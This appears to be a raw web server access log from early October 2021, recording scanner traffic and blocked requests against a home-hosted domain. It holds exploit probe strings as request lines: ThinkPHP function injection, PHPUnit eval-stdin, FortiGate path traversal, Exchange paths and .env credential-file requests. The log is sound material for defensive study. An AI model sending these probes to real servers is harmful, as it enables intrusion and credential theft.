Firefox / 62.0" "-" [04/Oct/2021:20:53:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Oct/2021:20:53:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Oct/2021:21:11:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Oct/2021:22:53:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.167.32.118] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [04/Oct/2021:22:53:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.167.32.118] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [04/Oct/2021:22:53:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.167.32.118] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [04/Oct/2021:22:53:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.167.32.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [04/Oct/2021:22:53:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.167.32.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [04/Oct/2021:22:53:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.167.32.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [04/Oct/2021:23:03:50 +0000] 400 - - https localhost "-" [Client 212.102.35.152] [Length 154] [Gzip -] "-" "-" [05/Oct/2021:00:04:01 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.139] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:00:10:24 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Oct/2021:00:31:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.207.202] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:01:26:44 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 164.90.135.69] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:01:26:57 +0000] 444 - GET https opds.moralanimal.net "/" [Client 64.225.0.239] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:01:38:58 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 134.209.167.220] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:01:41:06 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 164.90.140.19] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:01:44:38 +0000] 444 - GET https router.moralanimal.net "/" [Client 164.90.141.3] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:02:16:21 +0000] 444 - GET https home.moralanimal.net "/" [Client 64.225.14.26] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:02:22:45 +0000] 444 - GET https sql.moralanimal.net "/" [Client 164.90.139.129] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:02:24:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.112.26] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:02:25:54 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:02:27:18 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.204.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:02:31:33 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 142.93.183.11] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:02:31:34 +0000] 444 - GET https io.moralanimal.net "/" [Client 161.35.179.240] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:02:52:22 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [05/Oct/2021:02:52:32 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 165.227.183.247] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:02:53:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [05/Oct/2021:02:56:39 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 165.227.113.209] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:02:58:49 +0000] 444 - GET https komga.moralanimal.net "/" [Client 157.245.10.49] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:03:19:12 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 157.245.12.160] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:03:22:55 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 161.35.189.215] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:03:28:50 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 159.203.172.194] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [05/Oct/2021:03:51:30 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [05/Oct/2021:04:14:26 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Oct/2021:06:23:32 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.202.112] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:06:37:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [05/Oct/2021:06:47:15 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.86.35.19] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [05/Oct/2021:08:41:42 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [05/Oct/2021:09:06:08 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [05/Oct/2021:09:13:24 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:24 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:27 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:30 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:32 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [05/Oct/2021:09:13:33 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:34 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:38 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:38 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:13:42 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Oct/2021:09:23:07 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [05/Oct/2021:09:51:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.197.177] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:11:07:54 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.79.57.120] [Length 0] [Gzip -] "-" "-" [05/Oct/2021:12:46:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.206.16] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:14:59:14 +0000] 444 - GET https 64.22.31.253 "//remote/fgt_lang?lang=/../../../..//////////dev/" [Client 193.107.216.49] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [05/Oct/2021:15:59:33 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Oct/2021:15:59:33 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Oct/2021:16:57:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.186] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [05/Oct/2021:16:57:37 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.186] [Length 0] [Gzip -] "-" "-" [05/Oct/2021:16:57:38 +0000] 400 - - https localhost "-" [Client 185.31.175.220] [Length 154] [Gzip -] "-" "-" [05/Oct/2021:16:57:39 +0000] 444 - OPTIONS https localhost "/" [Client 185.31.175.220] [Length 0] [Gzip -] "-" "-" [05/Oct/2021:16:57:44 +0000] 400 - - https localhost "-" [Client 185.31.175.220] [Length 154] [Gzip -] "-" "-" [05/Oct/2021:17:02:48 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Oct/2021:17:02:48 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Oct/2021:17:02:48 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Oct/2021:17:02:48 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Oct/2021:17:02:48 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Oct/2021:17:02:48 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Oct/2021:17:47:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Oct/2021:19:56:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Oct/2021:20:18:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Oct/2021:21:03:10 +0000] 444 - GET https 64.22.31.253 "/?q=%gignitive%&va=b&t=hc&ia=web" [Client 35.236.7.100] [Length 0] [Gzip -] "-" "-" [05/Oct/2021:21:26:57 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 34.86.35.26] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [05/Oct/2021:21:59:23 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 3.101.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [05/Oct/2021:22:42:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.78.120.99] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [05/Oct/2021:22:42:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.78.120.99] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [05/Oct/2021:22:43:23 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.203.39] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Oct/2021:22:43:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Oct/2021:23:03:45 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.199.100] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Oct/2021:00:05:56 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.77] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Oct/2021:00:26:57 +0000] 400 - - http localhost "-" [Client 87.251.64.138] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:01:35:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.10] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [06/Oct/2021:01:41:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [06/Oct/2021:01:51:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [06/Oct/2021:01:51:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 128.14.141.42] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [06/Oct/2021:03:41:28 +0000] 400 - - http localhost "-" [Client 87.251.64.138] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:03:47:44 +0000] 400 - GET https localhost "-" [Client 178.62.200.112] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:03:51:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [06/Oct/2021:04:07:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [06/Oct/2021:04:20:38 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Oct/2021:04:52:08 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.5] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Oct/2021:04:53:56 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Oct/2021:04:54:58 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.193.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Oct/2021:05:12:56 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Oct/2021:05:37:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [06/Oct/2021:06:00:51 +0000] 400 - GET https localhost "/mcIC" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:06:13:30 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:06:23:58 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.203.62] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Oct/2021:06:48:18 +0000] 400 - - http localhost "-" [Client 87.251.64.138] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:08:19:33 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:33 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:34 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:37 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:38 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:38 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [06/Oct/2021:08:19:39 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:39 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:40 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:42 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:19:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Oct/2021:08:51:15 +0000] 400 - GET https localhost "-" [Client 145.220.25.28] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:09:55:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.210.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Oct/2021:10:21:57 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [06/Oct/2021:10:35:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [06/Oct/2021:11:10:50 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 199.19.225.172] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Oct/2021:11:11:34 +0000] 444 - GET https 64.22.31.253 "/proxy/network/api/self" [Client 107.77.236.37] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [06/Oct/2021:11:11:36 +0000] 444 - GET https 64.22.31.253 "/api/system" [Client 107.77.236.37] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [06/Oct/2021:11:15:10 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [06/Oct/2021:11:41:22 +0000] 444 - GET https 64.22.31.253 "/proxy/network/api/self" [Client 107.77.236.37] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [06/Oct/2021:11:41:23 +0000] 444 - GET https 64.22.31.253 "/api/system" [Client 107.77.236.37] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [06/Oct/2021:12:09:17 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Oct/2021:12:09:17 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Oct/2021:12:32:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Oct/2021:12:48:46 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.201.45] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" 